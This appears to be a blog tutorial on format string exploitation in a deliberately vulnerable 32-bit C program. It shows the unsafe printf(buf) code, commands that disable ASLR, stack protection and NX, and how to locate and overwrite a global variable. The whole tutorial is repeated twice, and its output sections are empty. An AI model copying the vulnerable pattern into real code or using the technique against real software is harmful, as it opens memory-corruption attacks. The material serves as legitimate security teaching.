This time we will add some more fun to format string exploitation. Newcomers please go through these posts part1 and part2 for better understanding of the basics of format string exploitation.
Task :
Set the value of target to 0xbeefbeef
Program :
// to be compiled as `gcc -o 3 3.c -m32`
#include
int target = 0;
int main(int argc, char **argv)
{
char buf[100];
strncpy(buf, argv[1], 100);
printf(buf);
if ( target == 0xbeefbeef )
printf("Pat yourself on the back for me, wont you?\n");
else
printf("\nYikes, the value of target=%08x\n", target);
return 0;
}
Disabling all counter mechanisms against buffer overflow attack and format string
exploitation :
Disabling address randomization using the following command:
#sysctl -w kernel.randomize_va_space=0
Disabling stack guard
# gcc -fno-stack-protector -o example example.c
Disabling NX protection
# gcc -z execstack -fno-stack-protector -o example example.c
To get the output we need to change the content of the global variable 'target'. In the program, the value is not changed anywhere and so the comparison condition always
returns false.
Our task is to find the address of variable target and rewrite the content with 'beefbeef '
By exploiting the format string vulnerability of ' printf ', we can output the contents of address locations in memory.
We input some characters (AAAA here )and out put the contents in memory. Observe for
the values 41414141 which is correspondent to AAAA. Thus we now know an address
location and we can overwrite the content there.
Using gdb we can find out the address of 'target' and we will put that address in AAAA's
position. So the content at this particular address will be overwritten with 48879 (beef) .We need to overwrite the adjacent address also(since we need beefbeef)
address : 0x804a024
I am writting 48864 instead of 48879. Why? This is left for the reader to find out.
(hint : I have already written some characters ,so the count of those characters should be subtracted. Understand properly what printf is actually doing.)
output :
Task :
Set the value of target to 0xbeefbeef
Program :
// to be compiled as `gcc -o 3 3.c -m32`
#include
int target = 0;
int main(int argc, char **argv)
{
char buf[100];
strncpy(buf, argv[1], 100);
printf(buf);
if ( target == 0xbeefbeef )
printf("Pat yourself on the back for me, wont you?\n");
else
printf("\nYikes, the value of target=%08x\n", target);
return 0;
}
Disabling all counter mechanisms against buffer overflow attack and format string
exploitation :
Disabling address randomization using the following command:
#sysctl -w kernel.randomize_va_space=0
Disabling stack guard
# gcc -fno-stack-protector -o example example.c
Disabling NX protection
# gcc -z execstack -fno-stack-protector -o example example.c
To get the output we need to change the content of the global variable 'target'. In the program, the value is not changed anywhere and so the comparison condition always
returns false.
Our task is to find the address of variable target and rewrite the content with 'beefbeef '
By exploiting the format string vulnerability of ' printf ', we can output the contents of address locations in memory.
We input some characters (AAAA here )and out put the contents in memory. Observe for
the values 41414141 which is correspondent to AAAA. Thus we now know an address
location and we can overwrite the content there.
Using gdb we can find out the address of 'target' and we will put that address in AAAA's
position. So the content at this particular address will be overwritten with 48879 (beef) .We need to overwrite the adjacent address also(since we need beefbeef)
address : 0x804a024
I am writting 48864 instead of 48879. Why? This is left for the reader to find out.
(hint : I have already written some characters ,so the count of those characters should be subtracted. Understand properly what printf is actually doing.)
output :
No comments:
Post a Comment